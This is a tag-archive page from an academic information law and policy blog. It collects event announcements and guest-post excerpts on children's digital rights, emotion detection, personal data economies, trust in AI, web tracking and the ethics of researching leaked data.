Tag Archives: information law and policy centre

Annual Conference 2017 Resources

The Information Law and Policy Centre held its third annual conference on 17th November 2017. The workshop’s theme was: ‘Children and Digital Rights: Regulating Freedoms and Safeguards’.

The workshop brought together regulators, practitioners, civil society, and leading academic experts who addressed and examined the key legal frameworks and policies being used and developed to safeguard children’s digital freedoms and rights. These legislative and policy regimes include the UN Convention on the Rights of the Child, and the related provisions (such as consent, transparency, and profiling) under the UK Digital Charter, and the Data Protection Bill which will implement the EU General Data Protection Regulation.

The following resources are available online:

  • Full programme
  • Presentation: ILPC Annual Conference, Baroness Beeban Kidron (video)
  • Presentation: ILPC Annual Conference, Anna Morgan (video)
  • Presentation: ILPC Annual Conference, Lisa Atkinson (video)
  • Presentation: ILPC Annual Conference, Rachael Bishop (video)

Emotion detection, personalisation and autonomous decision-making online

This event took place at the Information Law and Policy Centre at the Institute of Advanced Legal Studies on Monday, 5 February 2018.

Date
05 Feb 2018, 17:30 to 05 Feb 2018, 19:30
Venue
Institute of Advanced Legal Studies, 17 Russell Square, London WC1B 5DR

Speaker: Damian Clifford, KU Leuven Centre for IT and IP Law

Panel Discussants:

Dr Edina Harbinja, Senior Lecturer in Law, University of Hertfordshire.

Hamed Haddadi, Senior Lecturer (Associate Professor),  Deputy Director of Research in the Dyson School of Design Engineering, and an Academic Fellow of the Data Science Institute in the Faculty of Engineering, Imperial College London.

Chair: Dr Nora Ni Loideain, Director and Lecturer in Law, Information Law and Policy Centre, Institute of Advanced Legal Studies

Description:

Emotions play a key role in decision making. Technological advancements are now rendering emotions detectable in real-time. Building on the granular insights provided by big data, such technological developments allow commercial entities to move beyond the targeting of behaviour in advertisements to the personalisation of services, interfaces and the other consumer-facing interactions, based on personal preferences, biases and emotion insights gleaned from the tracking of online activity and profiling and the emergence of ‘emphathic media’.

Continue reading

Personal Data as an Asset: Design and Incentive Alignments in a Personal Data Economy

Registration open

Date
19 Feb 2018, 17:30 to 19 Feb 2018, 19:30
Institute
Institute of Advanced Legal Studies
Venue
Institute of Advanced Legal Studies, 17 Russell Square, London WC1B 5DR


Speaker:  Professor Irene Ng, Director of the International Institute for Product and Service Innovation and the Professor of Marketing and Service Systems at WMG, University of Warwick
Panel Discussants: Perry Keller, King’s College London and John Sheridan, National ArchivesChair:  Dr Nora Ni Loideain, Director and Lecturer in Law, Information Law & Policy Centre, Institute of Advanced Legal Studies

 

Description:

Despite the World Economic Forum (2011) report on personal data becoming an asset class  the cost of transacting on personal data is becoming increasingly high with regulatory risks, societal disapproval, legal complexity and privacy concerns.

Professor Irene Ng contends that this is because personal data as an asset is currently controlled by organisations. As a co-produced asset, the person has not had the technological capability to control and process his or her own data or indeed, data in general. Hence, legal and economic structures have been created only around Organisation-controlled personal data (OPD).

This presentation will argue that a person-controlled personal data (PPD), technologically, legally and economically architected such that the individual owns a personal micro-server and therefore have full rights to the data within, much like owning a PC or a smartphone, is potentially a route to reducing transaction costs and innovating in the personal data economy. I will present the design and incentive alignments of stakeholders on the HAT hub-of-all-things platform (https://hubofallthings.com).

Professor Irene Ng is the Director of the International Institute for Product and Service Innovation and the Professor of Marketing and Service Systems at WMG, University of Warwick. She is also the Chairman of the Hub-of-all-Things (HAT) Foundation Group (http://hubofallthings.com). A market design economist, Professor Ng is an advisor to large organisations, startups and governments on design of markets, economic and business models in the digital economy. Personal website http://ireneng.com

John Sheridan is the Digital Director at The National Archives, with overall responsibility for the organisation’s digital services and digital archiving capability. His role is to provide strategic direction, developing the people and capability needed for The National Archives to become a disruptive digital archive. John’s academic background is in mathematics and information technology, with a degree in Mathematics and Computer Science from the University of Southampton and a Master’s Degree in Information Technology from the University of Liverpool. Prior to his current role, John was the Head of Legislation Services at The National Archives where he led the team responsible for creating legislation.gov.uk, as well overseeing the operation of the official Gazette. John recently led, as Principal Investigator, an Arts and Humanities Research Council funded project, ‘big data for law’, exploring the application of data analytics to the statute book, winning the Halsbury Legal Award for Innovation. John has a strong interest in the web and data standards and is a former co-chair of the W3C e-Government Interest Group. He serves on the UK Government’s Data Leaders group and Open Standards Board which sets data standards for use across government. John was an early pioneer of open data and remains active in that community.

Perry Keller is Reader in Media and Information Law at the Dickson Poon School of Law, King’s College London, where he teaches and researches issues relating to freedom of expression, privacy and data protection. He is the author of European and International Media Law. Mr Keller’s current research concerns the transparency of urban life as a consequence of governmental and commercial surveillance and the particular challenges that brings for liberal democracies. He also has longstanding connections with China, having previously studied or worked in Beijing, Nanjing, Taipei and Hong Kong. His current research interests regarding law and regulation in China concern the development of a divergent Chinese model for securing data privacy and security.

A wine reception will follow this seminar.


Admission FREE but advance booking is required.

 

AI trust and AI fears: A media debate that could divide society

File 20180109 83547 1gya2pg.jpg?ixlib=rb 1.1

In this guest post, Dr Vyacheslav Polonski, Researcher, University of Oxford examines the key question of trust or fear of AI.

We are at a tipping point of a new digital divide. While some embrace AI, many people will always prefer human experts even when they’re wrong.

Unless you live under a rock, you probably have been inundated with recent news on machine learning and artificial intelligence (AI). With all the recent breakthroughs, it almost seems like AI can already predict the future. Police forces are using it to map when and where crime is likely to occur. Doctors can use it to predict when a patient is most likely to have a heart attack or stroke. Researchers are even trying to give AI imagination so it can plan for unexpected consequences.

Of course, many decisions in our lives require a good forecast, and AI agents are almost always better at forecasting than their human counterparts. Yet for all these technological advances, we still seem to deeply lack confidence in AI predictions. Recent cases show that people don’t like relying on AI and prefer to trust human experts, even if these experts are wrong.

If we want AI to really benefit people, we need to find a way to get people to trust it. To do that, we need to understand why people are so reluctant to trust AI in the first place.

Continue reading

A Prediction about Predictions

In this guest post, Marion Oswald offers her homage to Yes Minister and, in that tradition, smuggles in some pertinent observations on AI fears. This post first appeared on the SCL website’s Blog as part of Laurence Eastham’s Predictions 2018 series. It is also appearing in Computers & Law, December/January issue.

Continue reading

How websites watch your every move and ignore privacy settings

File 20171122 6055 jrvkjw.jpg?ixlib=rb 1.1

In this guest post, Yijun Yu, Senior Lecturer, Department of Computing and Communications, The Open University examines the world’s top websites and their routine tracking of a user’s every keystroke, mouse movement and input into a web form – even if it’s later deleted.

Hundreds of the world’s top websites routinely track a user’s every keystroke, mouse movement and input into a web form – even before it’s submitted or later abandoned, according to the results of a study from researchers at Princeton University.

And there’s a nasty side-effect: personal identifiable data, such as medical information, passwords and credit card details, could be revealed when users surf the web – without them knowing that companies are monitoring their browsing behaviour. It’s a situation that should alarm anyone who cares about their privacy.

The Princeton researchers found it was difficult to redact personally identifiable information from browsing behaviour records – even, in some instances, when users have switched on privacy settings such as Do Not Track.

Continue reading

Guilty until proven innocent? How a legal loophole is being used to name and shame children

File 20171026 13319 1cvf3uw.jpg?ixlib=rb 1.1

 

 

 

 

 

 

 

 

 

In this guest post, Faith Gordon, University of Westminster explores how, under UK law, a child’s anonimity is not entirely guaranteed. Faith is speaking at the  Information Law and Policy Centre’s annual conference – Children and Digital Rights: Regulating Freedoms and Safeguards this Friday, 17 November. 

Under the 1948 Universal Declaration of Human Rights, each individual is presumed innocent until proven guilty. A big part of protecting this principle is guaranteeing that public opinion is not biased against someone that is about to be tried in the courts. In this situation, minors are particularly vulnerable and need all the protection that can be legally offered. So when you read stories about cases involving children, it’s often accompanied with the line that the accused cannot be named for legal reasons.

However, a loophole exists: a minor can be named before being formally charged. And as we all know in this digital age, being named comes with consequences – details or images shared of the child are permanent. While the right to be forgotten is the strongest for children within the Data Protection Bill, children and young people know that when their images and posts are screenshot they have little or no control over how they are used and who has access to them.

Continue reading

Ethical issues in research using datasets of illicit origin

In this guest post Dr Daniel R. Thomas, University of Cambridge reviews research surrounding ethical issues in research using datasets of illicit origin. This post first appeared on “Light Blue Touchpaper” weblog written by researchers in the Security Group at the University of Cambridge Computer Laboratory.

On Friday at IMC I presented our paper “Ethical issues in research using datasets of illicit origin” by Daniel R. Thomas, Sergio Pastrana, Alice Hutchings, Richard Clayton, and Alastair R. Beresford. We conducted this research after thinking about some of these issues in the context of our previous work on UDP reflection DDoS attacks.

Data of illicit origin is data obtained by illicit means such as exploiting a vulnerability or unauthorized disclosure, in our previous work this was leaked databases from booter services. We analysed existing guidance on ethics and papers that used data of illicit origin to see what issues researchers are encouraged to discuss and what issues they did discuss. We find wide variation in current practice. We encourage researchers using data of illicit origin to include an ethics section in their paper: to explain why the work was ethical so that the research community can learn from the work. At present in many cases positive benefits as well as potential harms of research, remain entirely unidentified. Few papers record explicit Research Ethics Board (REB) (aka IRB/Ethics Commitee) approval for the activity that is described and the justifications given for exemption from REB approval suggest deficiencies in the REB process. It is also important to focus on the “human participants” of research rather than the narrower “human subjects” definition as not all the humans that might be harmed by research are its direct subjects.

The paper and the slides are available.

Too much information? More than 80% of children have an online presence by the age of two

File 20170918 8264 1c771h6.jpg?ixlib=rb 1.1

In this guest post, Claire Bessant, Northumbria University, Newcastle, looks into the phenomenon of ‘sharenting’. Her article is relevant to the Information Law and Policy Centre’s annual conference coming up in November – Children and Digital Rights: Regulating Freedoms and Safeguards.

A toddler with birthday cake smeared across his face, grins delightedly at his mother. Minutes later, the image appears on Facebook. A not uncommon scenario – 42% of UK parents share photos of their children online with half of these parents sharing photos at least once a month.

Welcome to the world of “sharenting” – where more than 80% of children are said to have an online presence by the age of two. This is a world where the average parent shares almost 1,500 images of their child online before their fifth birthday.

But while a recent report from OFCOM confirms many parents do share images of their children online, the report also indicates that more than half (56%) of parents don’t. Most of these non-sharenting parents (87%) actively choose not to do so to protect their children’s private lives.

Continue reading